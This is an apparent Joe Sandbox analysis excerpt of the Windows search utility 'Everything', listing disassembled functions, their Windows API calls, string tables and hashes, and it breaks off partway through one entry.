                                                                                                            • String ID: %s_%s$%s_%s_%s_keys$%s_%s_keys$.ini$Everything$allow_etp_server$allow_http_server$allow_index_change$app_data$background_color$bold$column_pos$column_visible$column_width$connect_history_hosts$connect_history_link_types$connect_history_ports$connect_history_usernames$etp_client_rewrite_patterns$etp_client_rewrite_substitutions$exclude_folders$explore_command$explore_path_command$failed to load config %s %d$failed to load config empty ini$filelist_monitor_changes$filelists$folder_buffer_size_list$folder_monitor_changes$folder_rescan_if_full_list$folder_update_ats$folder_update_days$folder_update_interval_types$folder_update_intervals$folder_update_types$folders$font$font_size$foreground_color$ntfs_volume_guids$ntfs_volume_include_onlys$ntfs_volume_includes$ntfs_volume_load_recent_changes$ntfs_volume_monitors$ntfs_volume_paths$ntfs_volume_roots$open_file_command$open_folder_command$open_folder_path_command$preview_background_color$refs_volume_guids$refs_volume_include_onlys$refs_volume_includes$refs_volume_load_recent_changes$refs_volume_monitors$refs_volume_paths$refs_volume_roots$run_as_admin$thumbnail_mouseover_border_color$translucent_selection_rectangle_background_color$translucent_selection_rectangle_border_color
                                                                                                            • API String ID: 918212764-3836139288
                                                                                                            • Opcode ID: db7567cc65027f267cc5bbfc8fa277ad13ad9742eaae11fbec128bb1a9a0e835
                                                                                                            • Instruction ID: 223ce0e5af9735f031dd048c8904d395007873660b613f1046290054890c0ba1
                                                                                                            • Opcode Fuzzy Hash: db7567cc65027f267cc5bbfc8fa277ad13ad9742eaae11fbec128bb1a9a0e835
                                                                                                            • Instruction Fuzzy Hash: C4C2D2A1E0CA9F91FF119BA1A8502B92791AF46B84F454036E96DC779BFF2CE005F740

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 541 7ff63d54fd80-7ff63d54fd9c 542 7ff63d54fdaa-7ff63d54fdc1 EnterCriticalSection 541->542 543 7ff63d54fd9e-7ff63d54fda5 call 7ff63d523fb0 541->543 545 7ff63d54fe32-7ff63d54fe81 LeaveCriticalSection call 7ff63d523fe0 call 7ff63d53f700 CreateEventW 542->545 546 7ff63d54fdc3-7ff63d54fdd8 542->546 543->542 555 7ff63d54fead-7ff63d54fec6 CreateEventW 545->555 556 7ff63d54fe83-7ff63d54feac GetLastError call 7ff63d524180 545->556 547 7ff63d54fdda-7ff63d54fde1 546->547 548 7ff63d54fde3-7ff63d54fde6 546->548 550 7ff63d54fdea-7ff63d54fe19 LeaveCriticalSection SetThreadPriority ResetEvent SetEvent 547->550 548->550 552 7ff63d54fe1f-7ff63d54fe31 550->552 558 7ff63d54fec8-7ff63d54fef1 GetLastError call 7ff63d524180 555->558 559 7ff63d54fef2-7ff63d54ff33 call 7ff63d6195f0 555->559 556->555 558->559 559->552 565 7ff63d54ff39-7ff63d54ffd5 GetLastError call 7ff63d524180 call 7ff63d5e7280 * 4 559->565 576 7ff63d54ffea-7ff63d54ffed 565->576 577 7ff63d54ffd7-7ff63d54ffe6 call 7ff63d5ed5a0 565->577 578 7ff63d550039-7ff63d550045 call 7ff63d5ed580 576->578 579 7ff63d54ffef 576->579 577->576 586 7ff63d550047-7ff63d550082 call 7ff63d5e88b0 call 7ff63d5ee2f0 LoadLibraryExW 578->586 587 7ff63d550085-7ff63d5500d3 call 7ff63d5ed580 * 3 call 7ff63d618fb0 578->587 582 7ff63d54fff0-7ff63d550001 GetSystemDirectoryW 579->582 582->578 584 7ff63d550003-7ff63d550009 582->584 588 7ff63d55000b 584->588 589 7ff63d550022-7ff63d550034 call 7ff63d5e8050 584->589 586->587 592 7ff63d55001b-7ff63d55001e 588->592 593 7ff63d55000d-7ff63d550017 call 7ff63d5ed5a0 588->593 589->578 592->582 598 7ff63d550020 592->598 593->592 598->578
                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FDB1
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FDF1
                                                                                                            • SetThreadPriority.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FDFD
                                                                                                            • ResetEvent.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FE07
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FE19
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FE39
                                                                                                              • Part of subcall function 00007FF63D53F700: GetProcessHeap.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F709
                                                                                                              • Part of subcall function 00007FF63D53F700: HeapAlloc.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F717
                                                                                                            • CreateEventW.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FE78
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FE83
                                                                                                              • Part of subcall function 00007FF63D524180: RegisterEventSourceW.ADVAPI32 ref: 00007FF63D524247
                                                                                                              • Part of subcall function 00007FF63D524180: ReportEventW.ADVAPI32 ref: 00007FF63D524286
                                                                                                              • Part of subcall function 00007FF63D524180: DeregisterEventSource.ADVAPI32 ref: 00007FF63D52428F
                                                                                                              • Part of subcall function 00007FF63D524180: ExitProcess.KERNEL32 ref: 00007FF63D52430F
                                                                                                            • CreateEventW.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FEBD
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF63D552EF5), ref: 00007FF63D54FEC8
                                                                                                            • GetLastError.KERNEL32 ref: 00007FF63D54FF39
                                                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00007FF63D54FFF7
                                                                                                            • LoadLibraryExW.KERNELBASE ref: 00007FF63D55007C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Event$CriticalErrorLastSection$CreateHeapLeaveProcessSource$AllocDeregisterDirectoryEnterExitLibraryLoadPriorityRegisterReportResetSystemThread
                                                                                                            • String ID: .\src\os.c$create thread$failed to create event %d$failed to create thread %d: %p$new thread (%d)$os_event_create$os_thread_create
                                                                                                            • API String ID: 2487606092-3768514261
                                                                                                            • Opcode ID: 00d2ff238357449508522a37c24dcbf82c77c61e248b8b58f6cf9779bf902a4e
                                                                                                            • Instruction ID: de7ef4e590286d50d732c4346eea175e5fec59bf44687b0fe891eb57f7812a8d
                                                                                                            • Opcode Fuzzy Hash: 00d2ff238357449508522a37c24dcbf82c77c61e248b8b58f6cf9779bf902a4e
                                                                                                            • Instruction Fuzzy Hash: EA915D32E08A5A92EB20DFA4E4501AA73A1FF85758F404132EA5DC37A9FF3CE555E740
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Read$ErrorHeapLast$AllocCloseCreateDefaultHandleLangPointerProcessSystem
                                                                                                            • String ID: Everything.lng$count %d$got header$header size %d$lng file opened!$system default lid %04x$version %d
                                                                                                            • API String ID: 3246460639-1027524925
                                                                                                            • Opcode ID: 73ff254f62daec7cfa77a2d8c4a902b985b5e38c6426fa56885baa6b6022713b
                                                                                                            • Instruction ID: b4b7c53d02f78f92fce89b1de923be77d88d93f0ae7ede4ef6ab79f8d80d8090
                                                                                                            • Opcode Fuzzy Hash: 73ff254f62daec7cfa77a2d8c4a902b985b5e38c6426fa56885baa6b6022713b
                                                                                                            • Instruction Fuzzy Hash: 6832443291C68AC6EB618B94E84037AB3A4FB85364F500135DE9DC2BA5EF7DE454EB10

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CloseCreateDestroyErrorExecuteForegroundHandleInfoLastObjectParametersRectShellSingleSystemWait
                                                                                                            • String ID: EVERYTHING_SHELL_EXECUTE$Enter ShellExecute$Leave ShellExecute$ShellExecuteExW(): GetLastError(): %d: failed to execute %s$p
                                                                                                            • API String ID: 395308030-1710855169
                                                                                                            • Opcode ID: e5d52cdcdb4a7199f75088e734e3a79b493ffe0256da252569693a1bb0d87525
                                                                                                            • Instruction ID: 367f89701ab713f2eb11c4f2dd7cb9092abe66a5439cd752c619c0d65f66639e
                                                                                                            • Opcode Fuzzy Hash: e5d52cdcdb4a7199f75088e734e3a79b493ffe0256da252569693a1bb0d87525
                                                                                                            • Instruction Fuzzy Hash: 71917732A0CA8A81E760EB95F4502EA7364FF857A4F445035DE5D83B99EF3CD514EB40

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D54B310: SHTestTokenMembership.SHELL32(?,?,?,?,00007FF63D5240A4), ref: 00007FF63D54B320
                                                                                                              • Part of subcall function 00007FF63D5B4C90: OpenSCManagerW.ADVAPI32 ref: 00007FF63D5B4CB6
                                                                                                              • Part of subcall function 00007FF63D5B4C90: OpenServiceW.ADVAPI32 ref: 00007FF63D5B4CF7
                                                                                                              • Part of subcall function 00007FF63D5B4C90: QueryServiceStatusEx.ADVAPI32 ref: 00007FF63D5B4D21
                                                                                                              • Part of subcall function 00007FF63D5B4C90: OpenServiceW.ADVAPI32 ref: 00007FF63D5B4D56
                                                                                                              • Part of subcall function 00007FF63D5B4C90: QueryServiceConfigW.ADVAPI32 ref: 00007FF63D5B4D8E
                                                                                                              • Part of subcall function 00007FF63D5B4C90: CloseServiceHandle.ADVAPI32 ref: 00007FF63D5B4DDB
                                                                                                              • Part of subcall function 00007FF63D5B4C90: CloseServiceHandle.ADVAPI32 ref: 00007FF63D5B4DF4
                                                                                                              • Part of subcall function 00007FF63D5B4C90: CloseServiceHandle.ADVAPI32 ref: 00007FF63D5B4E0D
                                                                                                            • GetCommandLineW.KERNEL32 ref: 00007FF63D5240D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandleOpen$Query$CommandConfigLineManagerMembershipStatusTestToken
                                                                                                            • String ID: NT$AppData %d$Everything$IsAdmin %d$Processors %d$Service %d$Version %s$Windows%s %d.%d$cmdline %S
                                                                                                            • API String ID: 946279963-3309248657
                                                                                                            • Opcode ID: 6b7df74d1fde17583d26ab7bae1f1a4fba1ff2ae0742a8d4f3bcaec9b349bb3d
                                                                                                            • Instruction ID: e1c6d6db8dfafadfc88d7ef6e2a60c3f5906859284d1bf95e358d193c734a4e5
                                                                                                            • Opcode Fuzzy Hash: 6b7df74d1fde17583d26ab7bae1f1a4fba1ff2ae0742a8d4f3bcaec9b349bb3d
                                                                                                            • Instruction Fuzzy Hash: 89212C61E1896F91FA10E7A0F8912B97321BFA635CF805035D86DC67A6FF2CE509B700

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandleOpen$HeapQuery$AllocConfigErrorLastManagerProcessStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 2358456074-0
                                                                                                            • Opcode ID: 198abadead56f94b2d0573679de9925dac270f21dd71bc4344d8ac0eab4c69a2
                                                                                                            • Instruction ID: 2a3e753e424babb57f6056822fa2d6637dcccfd2f8b24cb7600d5a665761d3ef
                                                                                                            • Opcode Fuzzy Hash: 198abadead56f94b2d0573679de9925dac270f21dd71bc4344d8ac0eab4c69a2
                                                                                                            • Instruction Fuzzy Hash: B5417261B09A8985FB74DB62E4453AA7361FB85B98F844035DE4E87B84EF3CE408E714

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F789
                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F797
                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F7A6
                                                                                                            • GetProcessHeap.KERNEL32(?,?,?,00007FF63D5E8940,?,?,000002DE,00007FF63D5241CB), ref: 00007FF63D53F7AE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$ErrorFreeLast
                                                                                                            • String ID: HeapFree(0x%08x,0,0x%08x): %d: Failed to free.
                                                                                                            • API String ID: 2874822613-2460790854
                                                                                                            • Opcode ID: 7c5dfb36b83c9eb1814290a3e7ccb68c7dec53eb10dbb3df846101a73fe8f8ce
                                                                                                            • Instruction ID: 8786623e70d631405a1111640926f355d4a367ac4c8c7a83aad999b3afcfde0a
                                                                                                            • Opcode Fuzzy Hash: 7c5dfb36b83c9eb1814290a3e7ccb68c7dec53eb10dbb3df846101a73fe8f8ce
                                                                                                            • Instruction Fuzzy Hash: F3E06520F18B4B82EB509BF2B88842A5265BF56FC9F005135DD1E83B65FE3CE0546300

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 938 7ff63d61aa00-7ff63d61aa18 GetModuleHandleA 939 7ff63d61aa1a-7ff63d61aa2d GetProcAddress 938->939 940 7ff63d61aa33-7ff63d61aa35 ExitProcess 938->940 939->940 941 7ff63d61aa2f 939->941 941->940
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000028,00007FF63D619755,?,?,00000000,00007FF63D61AF38,?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573), ref: 00007FF63D61AA0F
                                                                                                            • GetProcAddress.KERNEL32(?,?,00000028,00007FF63D619755,?,?,00000000,00007FF63D61AF38,?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573), ref: 00007FF63D61AA24
                                                                                                            • ExitProcess.KERNEL32 ref: 00007FF63D61AA35
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExitHandleModuleProcProcess
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 75539706-1276376045
                                                                                                            • Opcode ID: 6effe5b6004a4a5126d452c9df89515558f58b1a7e2b20148a48e16e3945f0ac
                                                                                                            • Instruction ID: 9634cf5f0ef9e40686c439deee06e27245c37c71a78c9b74b68e16510062f17f
                                                                                                            • Opcode Fuzzy Hash: 6effe5b6004a4a5126d452c9df89515558f58b1a7e2b20148a48e16e3945f0ac
                                                                                                            • Instruction Fuzzy Hash: 21E0E610F19B1E81EF549BE0AC9413413526F4AB45F48543CC46EC6791FE3CA95DB310

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F709
                                                                                                            • HeapAlloc.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F717
                                                                                                              • Part of subcall function 00007FF63D524180: RegisterEventSourceW.ADVAPI32 ref: 00007FF63D524247
                                                                                                              • Part of subcall function 00007FF63D524180: ReportEventW.ADVAPI32 ref: 00007FF63D524286
                                                                                                              • Part of subcall function 00007FF63D524180: DeregisterEventSource.ADVAPI32 ref: 00007FF63D52428F
                                                                                                              • Part of subcall function 00007FF63D524180: ExitProcess.KERNEL32 ref: 00007FF63D52430F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Event$HeapProcessSource$AllocDeregisterExitRegisterReport
                                                                                                            • String ID: .\src\mem.c$mem_alloc$out of memory %p
                                                                                                            • API String ID: 3100536496-3895202858
                                                                                                            • Opcode ID: 062f19402a3b4f219f2b45c24d0ab9e8c2d766bf70d81f557087a77c545f37b5
                                                                                                            • Instruction ID: df8c0d144c8ce2362749716fd9e04d82a999a7dd5b7b4a197269cc4fb5540031
                                                                                                            • Opcode Fuzzy Hash: 062f19402a3b4f219f2b45c24d0ab9e8c2d766bf70d81f557087a77c545f37b5
                                                                                                            • Instruction Fuzzy Hash: 92E01264E1579F81FB109BE0AC051F81320AB55755F44453ACD5D863B5EF3CA19AB600

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
